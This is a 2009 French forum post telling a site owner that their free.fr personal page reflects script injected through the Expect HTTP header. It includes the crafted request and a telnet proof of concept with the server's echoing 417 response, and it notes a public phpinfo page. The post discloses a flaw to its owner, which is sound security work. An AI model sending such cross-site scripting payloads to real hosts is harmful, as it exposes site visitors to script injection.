by SPLEENKIRBY » Thu Sep 03, 2009 2:26 am
Salut.
Ton site est vulnérable aux failles xss via l'expect header.
Ainsi, une requête HTTP de ce type pointé vers ton serveur renverra un alert dans un navigateur :
[code:1:e9b40660d4]GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert("Expect header vulnérable");</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1
.4322)
Host: perso101-g5.free.fr
Connection: Keep-Alive
[/code:1:e9b40660d4]
Cette faille n'est pas moindre, le XSS encore moins, donc attention. Même si cette vulnérabilité est souvent taguée d'un "low risk", elle est très facilement exploitable si tu autorise du contenu flash sur ton site.
Soit dit en passant, cette faille est présente sur beaucoup d'espaces perso free.
PoC :
[quote:e9b40660d4]
bt Desktop # telnet 212.27.63.101 80
Trying 212.27.63.101...
Connected to 212.27.63.101.
Escape character is '^]'.
GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert('Hello world!');</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR
.4322)
Host: perso101-g5.free.fr
Connection: Keep-Alive
HTTP/1.1 417 Expectation Failed
Date: Thu, 03 Sep 2009 01:30:45 GMT
Server: Apache/ProXad [Aug 9 2008 02:45:09]
Connection: close
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field could not be met by this server.<P>
The client sent<PRE>
[b:e9b40660d4]Expect: <script>alert('Hello world!');</script>[/b:e9b40660d4]
</PRE>
but we only allow the 100-continue expectation.
<ADDRESS>Apache/ProXad [Aug 9 2008 02:45:07] Server at perso101-g5.free.fr Port 80</ADDRESS>
</BODY></HTML>
Connection closed by foreign host.
[/quote:e9b40660d4]
[url=hxxp://www.google.fr/#q=expect+header+vulnerability]expect header vulnerability[/url] sur Google te donnera plus d'amples informations sur cette vulnérabilité.
De plus, ton phpinfo() est parfaitement visible à tous ici :
hxxp://perso101-g5.free.fr/info.php
Mis à part cela, je fais confiance à TorTukiTu pour le reste des injections SQL ou autre failles php, je n'ai pas trop regardé. (ah, si, je suis tombé sur la page "pirate?" :P)